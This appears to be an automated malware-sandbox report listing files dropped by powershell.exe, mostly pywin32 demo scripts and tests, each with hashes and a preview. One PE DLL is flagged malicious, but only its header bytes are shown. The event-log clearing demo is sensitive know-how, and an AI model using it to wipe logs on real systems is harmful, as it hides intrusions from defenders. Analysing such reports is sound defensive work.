                                                                                                                                                                                                            SSDEEP:24:8F4+MFJMqJlm/4TouvfHzFoKecQUTPxmOR3YvZMUKfpTp:f+MFJMqa/wdnHztelU1mORzUKfVp
                                                                                                                                                                                                            MD5:C7D9E2C80AC35C237B62CCD939EDAEA3
                                                                                                                                                                                                            SHA1:71635846798FA6F923C64F5309B56E1530C39DF0
                                                                                                                                                                                                            SHA-256:94EB0ABF791C853E0A8717F4ADF0B511ECA5562D5998A84A45E69069B91826A4
                                                                                                                                                                                                            SHA-512:7319D6356F099AE9B31F9168F71DB3D01943D7012D1ADF517FF04BD23BE7A8947B5AA2574AFBEDD70AEEB66721ACD9D000998BF670AA47D62C6D6100BBE3E6A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generate a base file name..import os..import time....import win32api..import win32evtlog......def BackupClearLog(logType):.. datePrefix = time.strftime("%Y%m%d", time.localtime(time.time())).. fileExists = 1.. retry = 0.. while fileExists:.. if retry == 0:.. index = "".. else:.. index = "-%d" % retry.. try:.. fname = os.path.join(.. win32api.GetTempPath(),.. f"{datePrefix}{index}-{logType}" + ".evt",.. ).. os.stat(fname).. except OSError:.. fileExists = 0.. retry += 1.. # OK - have unique file name... try:.. hlog = win32evtlog.OpenEventLog(None, logType).. except win32evtlog.error as details:.. print("Could not open the event log", details).. return.. try:.. if win32evtlog.GetNumberOfEventLogRecords(hlog) == 0:.. print("No records in event log %s - not backed up" % logType).. return
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2050
                                                                                                                                                                                                            Entropy (8bit):4.6911454857386765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ZI2utbtw61tXcbt9TfHibFplXgkHDHbxbCsng9syvwDaGWNyOPLZo:2DwqXE97spZbbxbTEsHuGWNyO+
                                                                                                                                                                                                            MD5:3068F9659D3039FB6560F68A9A1CCD1F
                                                                                                                                                                                                            SHA1:511CC6E37F85018C4A69DFB7DD5E5CFA03ECAB0E
                                                                                                                                                                                                            SHA-256:E6F856E144CD64AA08D7D12B08714875678B3B770E81A0EEEAB8BA9C3093264B
                                                                                                                                                                                                            SHA-512:F0C7DD7B2D7987CFEA18D2FD3EAFA883205A2DED160D00447C0A82A71F9F22B3E50AB07894D2B0846ACE4C3BD67DA863F266503151C17C218FD6E466DABE3540
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Kills a process by process name..#..# Uses the Performance Data Helper to locate the PID, then kills it...# Will only kill the process if there is only one process of that name..# (eg, attempting to kill "Python.exe" will only work if there is only..# one Python.exe running. (Note that the current process does not..# count - ie, if Python.exe is hosting this script, you can still kill..# another Python.exe (as long as there is only one other Python.exe)....# Really just a demo for the win32pdh(util) module, which allows you..# to get all sorts of information about a running process and many..# other aspects of your system.....import sys....import win32api..import win32con..import win32pdhutil......def killProcName(procname):.. # Change suggested by Dan Knierim, who found that this performed a.. # "refresh", allowing us to kill processes created since this was run.. # for the first time... try:.. win32pdhutil.GetPerformanceAttributes("Process", "ID Process", procna
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2821
                                                                                                                                                                                                            Entropy (8bit):4.6201000683199425
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:XrABBUZV1d9p+oGtrJJmkpgVUSVkN3d6sr3A4PEUqwwJJGrEnI6AbVfJcfaKo:X07UP1d98ZN2VLkN3IKMUqwwITbVRcfI
                                                                                                                                                                                                            MD5:C2FC4A872A6B556170F71589AEDB9662
                                                                                                                                                                                                            SHA1:50F07F2901A93BB05D566440C5C42E1A65758F87
                                                                                                                                                                                                            SHA-256:E77CB45397F50C71CBA008D37BB52265820F68775AAEBC0B494A3DD6F2CA361E
                                                                                                                                                                                                            SHA-512:30D15303FB77C9C8694E5E431F264FA53432075F27BD9F0C15436224E015690EFC4CB64335AF0F93739D0EB6C7F38848CCE8A67C4AABB50E8F17337398CAB0FB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A demo of using the RAS API from Python..import sys....import win32api..import win32ras......# The error raised if we can not..class ConnectionError(Exception):.. pass......def Connect(rasEntryName, numRetries=5):.. """Make a connection to the specified RAS entry..... Returns a tuple of (bool, handle) on success... - bool is 1 if a new connection was established, or 0 is a connection already existed... - handle is a RAS HANDLE that can be passed to Disconnect() to end the connection..... Raises a ConnectionError if the connection could not be established... """.. assert numRetries > 0.. for info in win32ras.EnumConnections():.. if info[1].lower() == rasEntryName.lower():.. print("Already connected to", rasEntryName).. return 0, info[0].... dial_params, have_pw = win32ras.GetEntryDialParams(None, rasEntryName).. if not have_pw:.. print("Error: The password is not saved for this connection").. print(..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21058
                                                                                                                                                                                                            Entropy (8bit):4.648430187265662
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:f6cCr1Gb8qrZ/tAg3f8XGDfazIcJqeGa9:f63robFA6f8efaBG6
                                                                                                                                                                                                            MD5:270124623641B2AA4B1C97CD0E5EFACE
                                                                                                                                                                                                            SHA1:D8B8C766CD4C3726396A19D5DE6A95234C0FF6D6
                                                                                                                                                                                                            SHA-256:779FFA0D50902B7DBABF3F2FE30B94E46C3B4A2E2C547376EA78E81F3BDE53F1
                                                                                                                                                                                                            SHA-512:0A165BE8DFF56561653C9ADEA61731A8A5ACB2FFAC18123FFFD03BEB2292398A90C48EEC7BD1DDFE00B092F1DA30A26C782F523E74C1DA705D881C7589F94E59
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A tool to setup the Python registry.......class error(Exception):.. pass......import sys # at least we can count on this!......def FileExists(fname):.. """Check if a file exists. Returns true or false.""".. import os.... try:.. os.stat(fname).. return 1.. except OSError as details:.. return 0......def IsPackageDir(path, packageName, knownFileName):.. """Given a path, a ni package name, and possibly a known file name in.. the root of the package, see if this path is good... """.. import os.... if knownFileName is None:.. knownFileName = ".".. return FileExists(os.path.join(os.path.join(path, packageName), knownFileName))......def IsDebug():.. """Return "_d" if we're running a debug version..... This is to be used within DLL names when locating them... """.. import importlib.machinery.... return "_d" if "_d.pyd" in importlib.machinery.EXTENSION_SUFFIXES else ""......def FindPackagePath(packageName, knownFileN
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3644
                                                                                                                                                                                                            Entropy (8bit):4.778092213569642
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:zGQrxvYYC64uPIa9hvnAu7yGFvu0jb1onYr+qI+r/iA:zGqGq9IwvnA3GFvuG5onYyqZLiA
                                                                                                                                                                                                            MD5:4F6EE333EE29E5080541CA4AB05580B0
                                                                                                                                                                                                            SHA1:3D60D78190D4D57E3C05AAD76406054AFBDA01BD
                                                                                                                                                                                                            SHA-256:7D484DD10EA3C0BDC89656F25BDA9F14AA4B5AE69CE1A40C377C01E7835E51A2
                                                                                                                                                                                                            SHA-512:E273D198A808F40CD89925808E0A3EBBEE4F72188FE8C6DD585CB267A15B6E3744DB5DD5C78516E20BD88AF6DE9DE04E8C106689194F9EC74DCDBDAA404FD68F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Install and register pythonXX_d.dll, pywintypesXX_d.dll and pythoncomXX_d.dll..#..# Assumes the _d files can be found in the same directory as this script..# or in the cwd.....import os..import shutil..import sys..import winreg....import win32api......def usage_and_die(rc):.. print().. print("This script is designed to copy and register the Python debug").. print("binaries. It looks for pythonXX_d.dll, pythoncomXX_d.dll etc,").. print("and installs them to work correctly with Python debug builds.").. print().. print("You will generally find this script in the. zip file that").. print("included these _d files. Please run this script from").. print("that directory").. sys.exit(rc)......if os.path.splitext(os.path.basename(win32api.__file__))[0].endswith("_d"):.. print("This scripts appears to be running a DEBUG version of Python.").. print("Please run it using a normal release build (python.exe)").. usage_and_die(1)....try:.. import pythoncom..e
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):34304
                                                                                                                                                                                                            Entropy (8bit):5.770507041904274
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:7us9dTayzEeMmRh+6WRfBebGIXObm4Pn:D9dDZRVWRfBeb1XObFPn
                                                                                                                                                                                                            MD5:E8FB2101C22E55370B5E5AAE285173E8
                                                                                                                                                                                                            SHA1:821AB7079239DCF493DFCA3B585CB52F555221B0
                                                                                                                                                                                                            SHA-256:AF1BCC35E1A84DC5869CC07F23C3478F14E3BDFFEFBB47EBC05B258413DF43C6
                                                                                                                                                                                                            SHA-512:6789C44710F1D46C5E22F9C8397EFC7F09105F93B1B4A0D38987E1D5225101D5EF0384E9E25183A26D92053421C12D68C41E34F9A8B7A43B4CF88D6F6507C2C2
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................f.......k.......k.......k.......k......gk......ik.......f..............gk......gk......gkd.....gk......Rich............................PE..L...B..g...........!.....<...F......';.......P............................................@..........................c..`....d..........x.......................t....\..T...........................`\..@............P.. ............................text...z:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....rsrc...x............j..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5917
                                                                                                                                                                                                            Entropy (8bit):5.077102272161415
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CgIvK6if3qPBNiCN9Od/nIjmWLw8C5qRWbiw6oTKFIZCf/tP:CkvgXiCNMdIj5w8KbidFtdP
                                                                                                                                                                                                            MD5:8BE93450AD20989856292E600E5977FD
                                                                                                                                                                                                            SHA1:C459F62A05C86610DC2509A471D5DBF3B4764BF3
                                                                                                                                                                                                            SHA-256:BBEE01D79045844CB234FCDEEE1D568CB066F14B4AC8B29E968987A504D2D75C
                                                                                                                                                                                                            SHA-512:615CE5FB77B62F8C86C6B9346EE32BF8BFE696C3585FCBD0B07A6AF0765E1443DC688B5918CE7334B6ED4392F000491A3073CE94C255238364C8DFCC03ADA530
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gN........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.d.k.rOe.....d.S.d.S.)......N)...TestSkipped..testmainc....................@...sL...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...SecurityTestsc....................C...sh...t...d.d...d...|._.z.t...d.d...d...|._.W.d.S...t.j.y3..}...z.|.j.t.j.k.r%..d.|._.W.Y.d.}.~.d.S.d.}.~.w.w.).N..z.Power Usersr......Administrator)...win32security..LookupAccountName..pwr_sid..admin_sid..pywintypes..error..winerrorZ.ERROR_NONE_MAPPED....self..exc..r.....oC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/test/test_security.py..setUp....s......................z.SecurityTests.setUpc....................C...s....d.S...Nr......r....r....r....r......tearDown....s......z.SecurityTests.tearDownc....................C...s:...|.j.d.u.r.t.d.....|...t...d.d...d
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6671
                                                                                                                                                                                                            Entropy (8bit):5.400504524505333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Ci9H3EW7989q4VprSWZQmTkVme8rpzOWJJFGaqeAO0C3pDR/z:JXEWBCqgRI8d5FG3eAI
                                                                                                                                                                                                            MD5:A67D7CD5083903F8715EFD59A0C96728
                                                                                                                                                                                                            SHA1:F2853A75B47B4408042AA28CB57A0D69D9AD0A89
                                                                                                                                                                                                            SHA-256:1253EACB1245457753AF92C08DFCA882A6A5FC7D064A476C276A159F59F57979
                                                                                                                                                                                                            SHA-512:31BED8F7DBFC998E0A1D31B00D9198E9EC360C8620EDC5B448761AB8D810C1B410CF7BCEC6A6AF74049B85E55B1A9CBCCC22C39F98615052CCCBAB10678AB8FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g. .......................@...sh...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j...Z.e.d.k.r2e.....d.S.d.S.)......N)...TestSkipped..testmainc....................G...sB...z.|.|...W.S...t.j.y ..}...z.|.j.t.j.t.j.f.v.r.t.|.......d.}.~.w.w...N)...win32api..error..winerror..sspiconZ.SEC_E_NO_CREDENTIALSZ!SEC_E_NO_AUTHENTICATING_AUTHORITYr....)...func..args..exc..r.....kC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/test/test_sspi.py..applyHandlingSkips....s..........................r....c....................@...s....e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'S.)(..TestSSPIc....................G...sP...z.|.|.....t.d.|...d.........t.j.y'..}...z.|...|.j.|.....W.Y.d.}.~.d.S.d.}.~.w.w.).Nz.expecting z. failure)...AssertionError..win32securityr......assertEqualr....)...self..hrr....r....r....r..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8196
                                                                                                                                                                                                            Entropy (8bit):5.354886457460827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CPfqqko05JPcV6tdTq6NqqGms1FBoi7GEdBcM5lhqqDvALt+7+6BzNqkNiWq8RqV:Efqqkos1ccDTq6NqqGms1FBoi7GfMXho
                                                                                                                                                                                                            MD5:497633B6442013362003C734BD0764EF
                                                                                                                                                                                                            SHA1:5A0BEBFDE9423C4AB4AC78403FDDB867853F8A05
                                                                                                                                                                                                            SHA-256:4CFD3E070F57B16B65CBEC4EA9DBCB59B58DE16097E4CFD94294F6C6EFBBE707
                                                                                                                                                                                                            SHA-512:F500579F31A9EEE46147B4E73F948F52691E5D9F899AF39012654EFBC0468C4F961957CD5268D9818F1F6C6347DE6B218CC58661929D1438C2587A269CE5829D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.'.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.d.k.rne.......d.S.d.S.)......N)...TestSkippedc....................@........e.Z.d.Z.d.d...Z.d.S.)...CurrentUserTestCasec....................C...sB...t.....}.|.d.k.r.t.d.....|...d.t.........}.|...|.t...t.j.......d.S.).Nz.NT AUTHORITYz.running as service account..\)...win32apiZ.GetDomainNamer....Z.GetUserName..assertEqualZ.GetUserNameExZ.NameSamCompatible)...self..domain..name..r.....oC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/test/test_win32api.py..testGetCurrentUser....s..............z&CurrentUserTestCase.testGetCurrentUserN)...__name__..__module__..__qualname__r....r....r....r....r....r.................r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...TestTimec...........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5547
                                                                                                                                                                                                            Entropy (8bit):4.5584835099793155
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:kHX4++c23OTu+LT7+9e+IXG0RYQiKKlCkKQaCaT8tBepVA:k3HoTQ53kKBHIBeXA
                                                                                                                                                                                                            MD5:6957B8E4AADA960D1F03A9F21E1C8F57
                                                                                                                                                                                                            SHA1:CAA6162239EE8E8B6331F6190CDB18565CB47985
                                                                                                                                                                                                            SHA-256:9FE0DED32AE72B86AFFD6E610F1366DB495A93B548A0D6DF23F0AC688309C970
                                                                                                                                                                                                            SHA-512:022BFD5D96B3A760A5C5DA4A523923B78CB89C10AB16FD56D2A17471AE585164B9DE240F6A799E016E5BB29C38D6445803ACCD78F20D05D715D08DE7A5B20A2E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys..import unittest....import pywintypes..import win32api......# A class that will never die vie refcounting, but will die via GC...class Cycle:.. def __init__(self, handle):.. self.cycle = self.. self.handle = handle......class PyHandleTestCase(unittest.TestCase):.. def testCleanup1(self):.. # We used to clobber all outstanding exceptions... def f1(invalidate):.. import win32event.... h = win32event.CreateEvent(None, 0, 0, None).. if invalidate:.. win32api.CloseHandle(int(h)).. 1 / 0.. # If we invalidated, then the object destruction code will attempt.. # to close an invalid handle. We don't wan't an exception in.. # this case.... def f2(invalidate):.. """This function should throw an OSError.""".. try:.. f1(invalidate).. except ZeroDivisionError as exc:.. raise OSError("raise 2")...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4165
                                                                                                                                                                                                            Entropy (8bit):4.81174482727229
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lA9NrXfBmTshsKnofZuOHLlvvXDkZuU9IUU1cz0r7UA:mzlrnofZuOHF0uU9IUUK0r7UA
                                                                                                                                                                                                            MD5:D341C7BBAA43A927C5CE216E192D6ECC
                                                                                                                                                                                                            SHA1:8DD7AA125DE710F4623062F311401DE41E3CCB9C
                                                                                                                                                                                                            SHA-256:22788B8E21DB9DC00767008CB918308C58D60772339DEBB19E814F85B4B6CE86
                                                                                                                                                                                                            SHA-512:10C698D81E5F7750AF464F58EAD586EC0A667B45E1FE87EDCF5AAA13CCB6967DB53B22C94651CB42F88296A8A7706B6C59B6DD249DC6421702BFF3B3731C6CD6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# General test module for win32api - please add some :)..import array..import os..import sys..import unittest....import pywintypes..import win32con..import win32gui..from win32clipboard import *....custom_format_name = "PythonClipboardTestFormat"......class CrashingTestCase(unittest.TestCase):.. def test_722082(self):.. class crasher:.. pass.... obj = crasher().. OpenClipboard().. try:.. EmptyClipboard().. # This used to crash - now correctly raises type error... self.assertRaises(TypeError, SetClipboardData, 0, obj).. finally:.. CloseClipboard()......class TestBitmap(unittest.TestCase):.. def setUp(self):.. self.bmp_handle = None.. try:.. this_file = __file__.. except NameError:.. this_file = sys.argv[0].. this_dir = os.path.dirname(this_file).. self.bmp_name = os.path.join(.. os.path.abspath(this_dir), "..", "Demos", "imag
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8227
                                                                                                                                                                                                            Entropy (8bit):4.724027172694636
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SXuXI2cSJMTwAJxGGHSPxSfJfxSfJFpqgsVbxSByKaVPfnzPbJKqXa435LYMq4SB:FMLU+P+5sPkyKKn3JKA351ZRZNTpA
                                                                                                                                                                                                            MD5:9325047B681E7E24154ACD02F9E3C2F0
                                                                                                                                                                                                            SHA1:F9BB22F61DA86A210E90A52E3645141138D97C39
                                                                                                                                                                                                            SHA-256:42BC8A7DCACBFB3927BE243B59FA10E50FAE2297F25D11348AC91088E2E28651
                                                                                                                                                                                                            SHA-512:63AED26B52AC133C3DA0B7BCA33852C737DF7D1A8BA58537AED6DCCC3ADB0ACC67B0BCE68268BA40FFEA9CA37F7BAB85A2B22EE3FFDEB8597253A7C54D33B880
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Test pywin32's error semantics"""....import unittest....import pythoncom..import pywintypes..import win32api..import winerror......class TestBase(unittest.TestCase):.. def _testExceptionIndex(self, exc, index, expected):.. # Check that exception.args is the same... self.assertEqual(exc.args[index], expected)......class TestAPISimple(TestBase):.. def _getInvalidHandleException(self):.. try:.. win32api.CloseHandle(1).. except win32api.error as exc:.. return exc.. self.fail("Didn't get invalid-handle exception.").... def testSimple(self):.. self.assertRaises(pywintypes.error, win32api.CloseHandle, 1).... def testErrnoIndex(self):.. exc = self._getInvalidHandleException().. self._testExceptionIndex(exc, 0, winerror.ERROR_INVALID_HANDLE).... def testFuncIndex(self):.. exc = self._getInvalidHandleException().. self._testExceptionIndex(exc, 1, "CloseHandle").... def testMessageInde
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8613
                                                                                                                                                                                                            Entropy (8bit):4.271011300740325
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:gkFAFe/JeGSMZP4owSU6iufGIRDCyxj+kiN1iH6N4WcP6L6b4WcP6qR9k9yfM2Dr:gkeOyadLckm1ZMdL2fsA
                                                                                                                                                                                                            MD5:FE939FF1ED32968BED5688E9B6C3CC5F
                                                                                                                                                                                                            SHA1:EBD617CE0872E77D34CEDC17EFA76EA13E85996F
                                                                                                                                                                                                            SHA-256:5A245490F49F2A65EA8D5ABACDA9EFA3A10A2D7D9A31C5E1C6D4B52BE4176140
                                                                                                                                                                                                            SHA-512:F5D5F42048F7EBE011C371B17B988E32E07B3DF0D0C96E8C7DC6DDF09236096A90106D85AAABEE03A36871B5A80FA6A87244F35DD74047059969ADF4EAD07288
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# odbc test suite kindly contributed by Frank Millman...import os..import sys..import tempfile..import unittest....import odbc..import pythoncom..from pywin32_testutil import TestSkipped..from win32com.client import constants....# We use the DAO ODBC driver..from win32com.client.gencache import EnsureDispatch......class TestStuff(unittest.TestCase):.. def setUp(self):.. self.tablename = "pywin32test_users".. self.db_filename = None.. self.conn = self.cur = None.. try:.. # Test any database if a connection string is supplied..... conn_str = os.environ["TEST_ODBC_CONNECTION_STRING"].. except KeyError:.. # Create a local MSAccess DB for testing... self.db_filename = tempfile.NamedTemporaryFile().name + ".mdb".... # Create a brand-new database - what is the story with these?.. for suffix in (".36", ".35", ".30"):.. try:.. dbe = EnsureDispatch("DAO.DBEngi
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4139
                                                                                                                                                                                                            Entropy (8bit):4.712918825708143
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:p2Jsyo8yToVT3feZM+HcE2dRvwRrHYcSA:Msy/EI3feZ+E2rvwRUcSA
                                                                                                                                                                                                            MD5:29FEABA6B93DBE25BB0B62991C8BB8DF
                                                                                                                                                                                                            SHA1:59656B884D3CD926710432A90EF054F455DBEBE9
                                                                                                                                                                                                            SHA-256:113DD57572B58C191CB2BB0230DD16795FDB2E996B41CAFFA2C8112D85DB9317
                                                                                                                                                                                                            SHA-512:0C129C177028713071BDB4CAF809499D2B5664AB42ED6A1C41A67DD73324106C395EA19C461313CC2BFD553A4C21450AE1697162A9D7A58300A633D873BDFE25
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import datetime..import operator..import time..import unittest....import pywintypes......class TestCase(unittest.TestCase):.. def testPyTimeFormat(self):.. struct_current = time.localtime().. pytime_current = pywintypes.Time(struct_current).. # try and test all the standard parts of the format.. # Note we used to include '%Z' testing, but that was pretty useless as.. # it always returned the local timezone... format_strings = "%a %A %b %B %c %d %H %I %j %m %M %p %S %U %w %W %x %X %y %Y".. for fmt in format_strings.split():.. v1 = pytime_current.Format(fmt).. v2 = time.strftime(fmt, struct_current).. self.assertEqual(v1, v2, f"format {fmt} failed - {v1!r} != {v2!r}").... def testPyTimePrint(self):.. # This used to crash with an invalid, or too early time... # We don't really want to check that it does cause a ValueError.. # (as hopefully this won't be true forever). So either wo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6222
                                                                                                                                                                                                            Entropy (8bit):4.809706033283874
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:l6KdSDQLJcNePn7qK5sbNe5UbMCxhMhi70hOhheBr8+V/B4vAv9H4wj23ch5y4o6:H4DQLJc4OKGb4YMKSi2cQBZum
                                                                                                                                                                                                            MD5:FE6CDF5A5FC84ABA8DC980FE26BCD37D
                                                                                                                                                                                                            SHA1:9340D8ED8F251C2C9DA4522D55BBD621FF86EB7C
                                                                                                                                                                                                            SHA-256:7DD6F016E8074FF6F74428B1DA6A068AE819FADA8DEB8F719E15C58616397502
                                                                                                                                                                                                            SHA-512:0AC86DFB939939044CD26FD2948051F5C5A3DA09C33835A92715AF20643E4C992DDED3AEB78B5EB7D2F23A974F8A348D5224C66BBA0688526F6CAB5C02A9D3A3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Tests for the win32security module...import unittest....import ntsecuritycon..import pywintypes..import win32api..import win32con..import win32security..import winerror..from pywin32_testutil import TestSkipped, testmain......class SecurityTests(unittest.TestCase):.. def setUp(self):.. self.pwr_sid = win32security.LookupAccountName("", "Power Users")[0].. try:.. self.admin_sid = win32security.LookupAccountName("", "Administrator")[0].. except pywintypes.error as exc:.. # in automation we see:.. # pywintypes.error: (1332, 'LookupAccountName', 'No mapping between account names and security IDs was done.').. if exc.winerror != winerror.ERROR_NONE_MAPPED:.. raise.. self.admin_sid = None.... def tearDown(self):.. pass.... def testEqual(self):.. if self.admin_sid is None:.. raise TestSkipped("No 'Administrator' account is available").. self.assertEqual(..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8378
                                                                                                                                                                                                            Entropy (8bit):4.913681557491016
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:lHUYq8Ge2KdhsEcq8R9ndL2KXa/6oDrc8Tqn2y3Bv6xzFr8UFeFDFALHxQxm:VUQ6gceIYR
                                                                                                                                                                                                            MD5:3C21767D96DF01C6AF1B6BA8CEF71E43
                                                                                                                                                                                                            SHA1:9F0BF3C6FED475D0EE01355FD21E402601C4D368
                                                                                                                                                                                                            SHA-256:4DC735DAC96E650DDDC8406625B85190D1C625DD992F036C4676ABD4E674FF02
                                                                                                                                                                                                            SHA-512:64EE7FD7AD65A972AFBB8971DBC0C6E34E5C88DB3E5FC581DE875D675F0F0DFCD9B48E350902416CFC05D47524AF9A7515540D40D034062DE773679641B63FB5
                                                                                                                                                                                                            Malicious:false
